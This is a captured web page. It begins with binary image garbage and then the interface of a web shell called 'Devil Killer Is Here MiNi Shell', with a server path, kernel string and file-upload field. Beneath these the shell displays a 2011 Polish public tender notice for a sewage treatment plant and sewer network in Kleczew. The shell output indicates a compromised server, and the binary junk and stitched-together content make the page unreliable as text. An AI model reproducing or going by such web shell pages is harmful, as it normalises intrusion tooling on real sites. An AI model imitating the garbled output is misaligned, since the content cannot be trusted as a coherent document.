JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110322/50538-N-2011.html

<p class="kh_header"><b>Kleczew: Budowa oczyszczalni ścieków i kanalizacji sanitarnej w Kleczewie</b><br>
<b>Numer ogłoszenia: 50538 - 2011; data zamieszczenia: 22.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kleczew , Plac Kościuszki 5, 62-540 Kleczew, woj. wielkopolskie, tel. 063 2700900, faks 063 2700940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kleczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków i kanalizacji sanitarnej w Kleczewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólna charakterystyka zadania inwestycyjnego:
Projektowana budowa: Przebudowa i rozbudowa oczyszczalni ścieków w Kleczewie objęta zadaniem inwestycyjnym polega na budowie:
a/ na terenie istniejącej oczyszczalni ścieków :
-komory pomiarowej z przepływomierzami elektromagnetycznym ENKO
-dwóch piaskowników wirowych o średnicy 1,8m x2,9m
- komory mieszania i rozdziału
- nowych dwóch zblokowanych wysokosprawnych reaktorów biologicznych jednoosadowych trójfazowych w konstrukcji żelbetowej o wymiarach w rzucie 23,0 x 16,8 x 5,2m
- nowych osadników wtórnych w konstrukcji żelbetowej o wymiarach w rzucie 7,8 x 7,8 x 6,5mx 2 szt
- stacji dmuchaw z 4 dmuchawami AERZEN typu GM 10S-80 o parametrach Q=8m3/min ,
p=600mbar
- przepompowni osadu recyrkulowanego i nadmiernego z dwoma pompami zatapialnymi typu
AFP 1041.2 M 30/4D o parametrach pracy : Q=120m3/h , H=3m sł wod.
- dwóch zagęszczaczy grawitacyjnych osadu nadmiernego fi4,5m , H = 4,39 m
- zblokowanej stacji odwadniania i higienizacji osadu w oparciu o prasę taśmową
MONOBELT NP 08 o przepustowości hydraulicznej 2-6 m3/h zainstalowanej w budynku o
wymiarach w rzucie 6 x 6m wraz z stacją dawkowania polielektrolitu
- wiaty na osad odwodniony i zhigienizowany
- kanałów międzyobiektowych w tym powiązanie odpływu z oczyszczalni z istniejącym
odprowadzalnikiem
- wyposażenie obiektu w agregaty prądotwórcze w zabudowie kontenerowej jako 3 źródła
zasilania zlokalizowane na terenie przepompowni głównej i oczyszczalni ścieków
- urządzenia towarzyszące takie jak szafy sterownicze itp. zblokowane są w kontenerze przy
reaktorze biologicznym , w stacji odwadniania i higienizacji oraz w istniejącym budynku administracyjno socjalnym
b/ na terenie istniejącej przepompowni ścieków:
-	komory krat składającej się z komory rozdziału z zasuwami, dwóch komór krat oraz komory połączeniowej,
-	przepompowni ścieków składającej się z komory rozdziału, dwóch komór z pompami oraz komory zasuw
-	kanałów międzyobiektowych - dostosowanie do nowych obiektów sieci kanalizacji sanitarnej, rurociągów tłocznych, sieci wodociągowej i kabli energetycznych
  c/ drogi dojazdowej - 728,4 mb 
  d/  kanalizacji sanitarnej w ul. Dożynkowej
       Kolektor główny fi 200 mm PCV-U - 82,50 m
       Przykanaliki fi160 mm PCV-U - 60,75 m, szt. 8
       Rurociąg tłoczny ścieków fi 90 mm PE-HD - 58,86 m
       Przepompownia ścieków dwupompowa fi 1,5 m z betonu B45 - szt 1, wydajność 3,84
       m3/d, 4 l/s
       Studnie kanalizacyjne fi 1,2 m z betonu B45 - szt. 7
       Studnie przykanalikowe f o,425 m z PCV-U - szt. 8


Kolejność realizacji poszczególnych obiektów :
a/ oczyszczalni ścieków :
- demontaż istniejącego kabla oświetleniowego
- demontaż istniejącego kanału odprowadzającego odciek z poletek osadowych na których zaprojektowano oczyszczalnię
- likwidacja jednego ciągu poletek osadowych
- przełożenie istniejącej kanalizacji sanitarnej na odc. Si1 - Si2
- przełożenie istniejącego wodociągu Ww1-Ww5
- budowa piaskowników wirowych
- budowa komory rozprężnej
- budowa komory rozdziału
- budowa reaktorów biologicznych RB - obiekt 4
- budowa osadników wtórnych OWT - obiekt 5
- budowa przepompowni osadu recyrkulowanego i nadmiernego-obiekt 6
- budowa zagęszczaczy - obiekt nr 7
- budowa stacji dmuchaw - obiekt nr 10
- stanowiska PIX-u - obiekt nr.11
- budowa stacji odwadniania osadu - obiekt nr. 8
- budowa sieci między obiektowej
- budowa rurociągów tłocznych na odc. Wt1 - piaskowników
- budowa komory pomiarowej - obiekt nr.15
- przebudowa istniejący budynek energetyczno - socjalny z dyspozytornią
- przebudowa istniejącej lokalnej przepompowni ścieków 15
- przebudowa komory pomiarowej na wylocie
- wykonanie sieci kablowej elektrycznej i AKP wraz z wyposażeniem obiektów w urządzenia
- budowa wiaty na osad odwodniony i zhigienizowany
- rozruch
- demontaż istniejących biobloków
b/ przepompowni ścieków
-	budowa komory krat
-	budowa przepompowni ścieków 
-	budowa kanałów międzyobiektowych i sieci
-	przebudowa istniejących zbiorników retencyjnych 
-	adaptacja istniejącej przepompowni na zbiornik retencyjny
-	adaptacja istniejącego budynku krat na magazyn
 c/ droga dojazdowa na dł. 728,4 mb
-	Warstwa odcinająca 
-	Podbudowa z tłucznia kamiennego
-	Warstwa wiążąca i ścieralna z betonu asfaltowego
  d/ kanalizacji sanitarnej w ul. Dożynkowej
       Kolektor główny fi 200 mm PCV-U - 82,50 m
       Przykanaliki fi160 mm PCV-U - 60,75 m, szt. 8
       Rurociąg tłoczny ścieków fi 90 mm PE-HD - 58,86 m
       Przepompownia ścieków dwupompowa fi 1,5 m z betonu B45 - szt 1, wydajność 3,84
       m3/d, 4 l/s
       Studnie kanalizacyjne fi 1,2 m z betonu B45 - szt. 7
       Studnie przykanalikowe f o,425 m z PCV-U - szt. 8


STAN ISTNIEJĄCY
 Istniejące obiekty kubaturowe , drogowe i ogrodzenia
- obiekty istniejące oczyszczalnia:
- 3 BIOBLOKI WSm 400 w skład którego wchodzą : krata łukowa , komora osadu czynnego , osadnik
wtórny pionowy oraz wydzielona komora stabilizacji osadu nadmiernego obiekt w złym stanie
technicznym do rozbiórki po rozruchu nowych ciągów oczyszczalni
- 2 zbiorniki retencyjne o powierzchni zabudowy ok. 660 m2 każdy - wykorzystane po oczyszczeniu
- 6 filtrów gruntowych o powierzchni ok. 960 m2 każdy - wykorzystane po oczyszczeniu i wymianie górnej warstwy filtracyjnej
- Pomiar ścieków w komorze pomiarowej na odpływie - wykorzystany + poszerzony zakres pomiarów
- Dwie sekcje poletek osadowych po 1200 m2 każda - jedna sekcja zachowana jako awaryjne składowisko ;
druga sekcja do rozbiórki - teren wykorzystano pod budowę nowych obiektów
- Wylot ścieków do odbiornika - Struga Kleczewska - wykorzystany po remoncie konstrukcji 
- budynek energetyczno - socjalny z dyspozytornią , obiekt nr 13 - wykorzystany po modernizacji ujętej w branżowym projekcie
powierzchnia zabudowy - 380,4 m2 - bez zmian po modernizacji
kubatura - 1512,0 m3 - bez zmian
- lokalna przepompownia ścieków , obiekt nr 14 - do wykorzystania po adaptacji wyposażenia i wymianie płyty górnej
powierzchnia zabudowy - 2,6 m2
kubatura - 8,2 m3
- drogi istniejące z płyt drogowych 1,5 m x 3,0 m - do rozbiórki w zakresie przewidzianym do przebudowy lub odtworzenia
- istniejące ogrodzenie całego terenu oczyszczalni o długości ok. 800 m - do odbudowy.
- obiekty istniejące przepompownia ścieków:  
     Budynek krat
      Przepompownia
      Dwa zbiorniki retencyjne
      Punkt zlewny
      Drogi istniejące asfaltowe - do rozbiórki w zakresie przewidzianym do przebudowy lub odtworzenia
   Istniejące ogrodzenie całego terenu przepompowni - do odbudowy
- droga dojazdowa - istniejąca gruntowa do przebudowy


Istniejące uzbrojenie terenu
Obecnie na terenie oczyszczalni ścieków istnieją sieci zapewniające jej funkcjonowanie :
- sieć elektroenergetyczna i AKPiA ,
- sieć wodociągowa ,
- sieci technologiczne obecnej oczyszczalni ścieków ( BIOBLOK ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67  ust. 1 pkt 6 Ustawy.                                                                                                                        
 Zamówienia uzupełniające będą mogły zostać udzielone jeżeli:
a.	polegają na  tego samego rodzaju zamówień jak zamówienie podstawowe, i są zgodne z przedmiotem zamówienia podstawowego
b.	wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego,
c.	zostaną udzielone w terminie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.32.20-7, 45.23.13.00-8, 45.23.24.23-3, 45.23.10.00-5, 45.11.27.10-5, 45.11.30.00-2, 45.11.12.00-0, 45.23.31.23-7, 45.23.32.90-8, 45.23.24.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 150 000 ,- PLN ( sto pięćdziesiąt tysięcy )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny tego warunku na podstawie oświadczenia, o którym mowa w dziale VIII pkt 2 ppkt 1) SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca wykaże wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej  roboty budowlanej polegającej na budowie oczyszczalni ścieków ( z wyłączeniem przydomowych )  i kanalizacji sanitarnej o wartości zadania min. 5 000 000,00 PLN brutto, 

Zamawiający dokona oceny tego warunku na podstawie wykazu, o którym mowa w dziale VIII pkt 2 ppkt 2) SIWZ, oraz dokumentów potwierdzających, że roboty zostały wykonane należycie .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca wykaże, dysponowanie osobami, które będą uczestniczyć  w wykonywaniu zamówienia, w tym personel kierowniczy posiadający uprawnienia niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane w specjalności konstrukcyjno - budowlanej lub innej pokrewnej, w zakresie kierowania robotami budowlanymi, należącymi do właściwej izby samorządu zawodowego;
Zamawiający dokona oceny tego warunku na podstawie wykazu, o którym mowa w dziale VIII pkt 2 ppkt 3), 3a i 4) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek powyższy zostanie spełniony, jeżeli wykonawca:
- wykaże posiadanie środków finansowych lub zdolności kredytowej w wysokości min. 2.000.000 PLN brutto;
- wykaże, że posiada ważne ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej na kwotę nie mniejszą niż 3.000.000,- PLN
Zamawiający dokona oceny tego warunku na podstawie dokumentów, o których  mowa w dziale VIII pkt 2 ppkt 5 ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy (wg załącznika nr 1 do SIWZ)
2)	 kosztorys ofertowy , opracowany zgodnie z Działem XIII pkt  2
3)	dowód wniesienia wadium
4)	pełnomocnictwo - w przypadku, gdy oferta została podpisana przez  pełnomocnika  lub gdy oferta została złożona przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia  zgodnie z art. 23  ustawy - w załączeniu wzory do wykorzystania takich pełnomocnictw (załącznik nr 6 i 7 do SIWZ)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1.Strony dopuszczają możliwość przedłużenia terminu wykonania przedmiotu umowy  o czas opóźnienia,  
   jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących  
   przypadkach: 
   a/ wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia robót, których   
     realizacja wiąże się z potrzebą zmiany terminu wykonania, 
   b/ szczególnie niesprzyjające warunki atmosferyczne, które uniemożliwiają wykonanie robót
   c/ siły wyższej.
2.Możliwa jest zmiana umowy w zakresie kluczowego personelu wykonawcy, za uprzednią zgodą  
   zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze w 
   sytuacji, gdy dotychczasowy kierownik z przyczyn losowych nie może dalej wykonywać powierzonych 
   mu czynności.
3. Zmiana stawki podatku VAT.

 Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kleczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy i Miasta w Kleczewie
Pl. Kościuszki 5, 62-540 Kleczew
pok. nr 201.</p>
